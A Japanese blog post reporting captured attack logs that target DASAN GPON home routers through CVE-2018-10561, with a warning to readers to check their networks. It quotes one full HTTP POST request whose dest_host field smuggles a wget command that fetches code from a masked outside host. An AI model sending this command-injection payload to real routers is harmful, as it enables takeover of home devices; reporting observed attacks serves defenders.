DASAN Network Solutionsのホームルーターを狙った攻撃(CVE-2018-10561)をキャッチ
5月6日ごろから急激にきている攻撃ログを発見したので、ご紹介します。
具体的なアクセスは下記のようなものです。
POST /GponForm/diag_Form?images/ HTTP/1.1 Cache-Control: no-cache Connection: keep-alive Content-Length: 119 Content-Type: text/plain Host: XXX.XXX.XXX.XXX:80 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=wget;wget -qO - http://YYY.YYY.YYY.YYY/gpon.php?port=80&ipv=0
/GponForm/diag_Form?images/に対し、POSTリクエストを投げていて、何やらwgetコマンドでどこかのサーバから何かを取得するような動きになっています。
これは、韓国のDASAN Networksが販売しているホームルーターの脆弱性(CVE-2018-10561)を狙った攻撃で、すでにExploitコードが公開されています。
下記のサイトでは実際にサンプルでExploitコードを実行し、任意のコマンドを実行している動画を閲覧することができます。
上記の動画でも紹介されていますが、少なくとも100万以上のGPONホームルーターが世界中で稼働していることが判明しておりますので、ご自身のネットワークでGPON製のものがないかご確認をお願いします。
とはいっても、僕は初めてGPONという会社を聞きましたので、そこまで日本では有名じゃないのかもしれません。 (逆にぼくがネットワークに疎いだけなのかもしれませんが。。。)
IoTが流行している世の中で、ネットワークに接続される機器が攻撃対象になってしまうのは、仕方がないのですが、怖いですね。。。